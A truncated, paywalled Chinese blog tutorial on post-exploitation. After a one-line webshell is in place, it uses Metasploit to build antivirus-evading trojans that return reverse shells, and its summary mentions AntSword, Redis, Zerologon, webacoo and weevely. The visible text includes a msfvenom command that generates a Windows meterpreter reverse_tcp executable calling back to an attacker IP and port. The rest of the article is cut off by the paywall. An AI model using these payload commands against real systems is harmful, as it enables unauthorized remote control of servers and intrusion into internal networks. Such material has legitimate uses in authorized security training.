超级会员免费看
本文详细介绍了如何在Windows和Linux环境中利用msf制作和利用免杀木马反弹shell,包括蚁剑、Redis、zerologon漏洞等手段进行渗透。通过免杀木马、Web后门工具webacoo和weevely,实现在kali系统下的服务器控制和内网渗透。
现在情况是已经上传了一句话木马,可以执行如:ls、pwd、whoami等命令;不管是python、bash 还是 perl 都反弹不了, 偷不了懒了,就上 msf 吧。
一、windows一句话木马反弹shell思路
前提:目标在有webshell权限下,利用kali的msf制作木马反弹shell过程。
启动kali中的msf
┌──(root@SC)-[~]
└─# msfconsole生成exe类型反弹型木马,LHOST=kali 的 ip。
msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o shell.exe
[*] exec: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.173.4 LPORT=4444 -f exe -o sh
订阅专栏 解锁全文
扫一扫
719
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
